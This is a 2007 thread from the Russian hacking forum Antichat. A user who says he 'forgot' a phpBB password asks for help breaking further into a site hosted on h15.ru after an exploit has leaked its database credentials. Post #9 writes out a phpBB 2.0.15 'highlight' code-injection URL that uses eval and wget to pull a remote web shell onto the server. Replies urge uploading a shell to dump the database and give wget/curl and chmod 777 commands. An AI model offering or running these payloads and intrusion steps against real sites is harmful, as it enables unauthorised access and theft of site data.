ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

h15 mySQL
  #1  
Старый 21.11.2007, 17:51
Аватар для am@tory
am@tory
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485

Репутация: 44
По умолчанию h15 mySQL

Всем привет! Забыл пароль от форума phpbb

заюзал сплойтик, узнал пасс и логин к дб., но адресок к дб мне совсем не понравился, выглядело это вот так

Connecting OK
Sending exploit OK
Database Host: database
Database Name: xxxxxx5
Username: xxxxxx5
Password: xxxxxx5

гугл подсказал мне, что это нормально, т к доступ к mySQL на h15.ru возможен только с локал машины.

Это так???

Далее появилась идея залить с помощью PuttyFTP, скриптик, который копернул бы всю БД.
Но опять столкнулся с проблемой такого содержания, врубил Putty, указал адресок, ввел логин, а вот пасс вводиться не хочет, ни руками, ни копипастом.
Пробывал логиниться через браузер, но натыкаюсь на 403 - Forbidden
Попробывал зарегить, свой сайтик, чтобы протестить Putty на нем, но рега временно в дауне (((
Что здесь может быть не так???
Или просто у них вместе с регой и авторизация в дауне?
И вообще верна ли логика моих действий? или есть способы получше?

Последний раз редактировалось am@tory; 21.11.2007 в 17:56..
 

  #2  
Старый 21.11.2007, 17:55
Аватар для FHT
FHT
Постоянный
Регистрация: 21.09.2005
Сообщений: 525
Провел на форуме:
2994394

Репутация: 547


Отправить сообщение для FHT с помощью ICQ
По умолчанию

Цитата:
...а вот пасс вводиться не хочет, ни руками, ни копипастом.
o.0
Хы тоже высаживался в первые разы...Когда вводишь, он не отображается на экране, ни звездочками, никак.
Тоесть: ввел и жми.
 

  #3  
Старый 21.11.2007, 17:59
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

Хуже нет, когда пароль не знаешь, да еще и забыл ))

1). Залей шелл. Если смог вытащить пароли к бд, то это не проблема. В нормальном есть функция бекапа базы (хоть с локалхоста)
2). найди на сайте что-то вроде phpmyadmin

P.S. ты указываешь пароли от БД к акку от FTP?

Последний раз редактировалось Basurman; 21.11.2007 в 18:01..
 

  #4  
Старый 21.11.2007, 18:09
Аватар для am@tory
am@tory
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485

Репутация: 44
По умолчанию

Всем огромное спасибо, у меня еще 1 вопрос.
Не знаю о хосте на холме нечего, в мануале ихнем написано

Цитата:
Для администрирования Ваших виртуальных серверов мы предоставляем Ваш shell доступ. Он также необходим для работы с БД MySQL и отладки CGI скриптов. Доступ к shell осуществляется с помощью SSH-клиента. Для его использования Вам необходимо скачать и установить SSH-клиент, например Putty. В архиве кроме самого ssh клиента находится утилита, аналогичная утилите scp, которая позволяет осуществлять копирование файлов. Настройка клиента сводится к указанию имени хоста, указания протокола, вводу имени пользователя и пароля. Для нашего сервера это:

Пароль: Ваш пароль в системе (тот же, что и для FTP доступа)
Возможно ли изменить пассы там, т е на фтпшник и mySQL разные поставить?
Просто что то не могу я залогиться на фтп(

Цитата:
ты указываешь пароли от БД к акку от FTP?
насколько я понял, сплойт дает 1 пасс от бд и это наверно от фтп тоже, судя из выше описанного. нет?

Последний раз редактировалось am@tory; 21.11.2007 в 18:18..
 

  #5  
Старый 21.11.2007, 18:19
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

там и так разные уже...

нет. сплоит тебе вернул пароль от БД. ФТП аккаунт (как и SSH) совсем другой
 

  #6  
Старый 21.11.2007, 18:20
Аватар для am@tory
am@tory
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485

Репутация: 44
По умолчанию

Цитата:
Сообщение от Basurman  
там и так разные уже...
понятно...
В силу слабых знаний, на этом мои гениальные идеи заканчиваются)) Можно еще чтонить сделать, зная только пасс от бд на локалмашине? форум phpbb v2.0.15

Последний раз редактировалось am@tory; 21.11.2007 в 18:22..
 

  #7  
Старый 21.11.2007, 18:35
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

в третьем сверху сообщении я тебе уже ответил
 

  #8  
Старый 21.11.2007, 18:36
Аватар для am@tory
am@tory
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485

Репутация: 44
По умолчанию

Цитата:
Сообщение от Basurman  
в третьем сверху сообщении я тебе уже ответил
Я не особо знаком с такими методами, я пока литературку полопачу, а ты если сможеш отпишись мне сеня в асю плз.
 

  #9  
Старый 22.11.2007, 04:58
Аватар для am@tory
am@tory
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485

Репутация: 44
По умолчанию

Помогите плз.
phpbb 2.0.15
Вообщем вот что мне удалось узнать

http://site.h15.ru/forum//viewtopic.php?t=&highlight='.phpinfo().'

Put_phpinfo: [/home/b/site.h15.ru/WWW/forum//viewtopic.php]

Смогу ли я залить шелл таким запросом???

http://site.h15/forum/viewtopic.php?&cmd=wget http://shells//fuck.php;&highlight='.eval($HTTP_GET_VARS[cmd]).'

Или нет???
Ответьте плз..

И еще огромная просьба, кто может дать шел, чтобы стибрить всю sql, зная логин и пасс???

Если я не прав, то плз подробно опишите куда, как, что и как потом достать)))

Вообще пробывал заюзать сплойт
http://milw0rm.com/exploits/1076
Не смог, т не знаю какой командой залить шел, оп пристал ко мне с табличкой вида
site.h15.ru/forum/$ а что написать я незнаю....

Последний раз редактировалось am@tory; 22.11.2007 в 05:06..
 

  #10  
Старый 22.11.2007, 05:53
Аватар для j0nathan
j0nathan
Познающий
Регистрация: 13.07.2006
Сообщений: 65
Провел на форуме:
172569

Репутация: 11
По умолчанию

юзай nst shell Вообще на хэ15 дыры же латают я думаю сплойт который есть в паблике врятли поможет

Шелл заливается командой wget http://адресс шела
Главное чтобы в адресе cd была папка с правами на запись
Ну если у тебя есть права на выполнение то можно chmod 777 команду выполнить
ещё есть команды curl -0 ./shell.php http://адресс (вроде так)
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Часто задаваемые вопросы по MySQL Серый PHP, PERL, MySQL, JavaScript 5 28.12.2006 18:26
SQL injection в MySql сервере версии 3,x bandera Чужие Статьи 3 04.06.2006 16:17
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ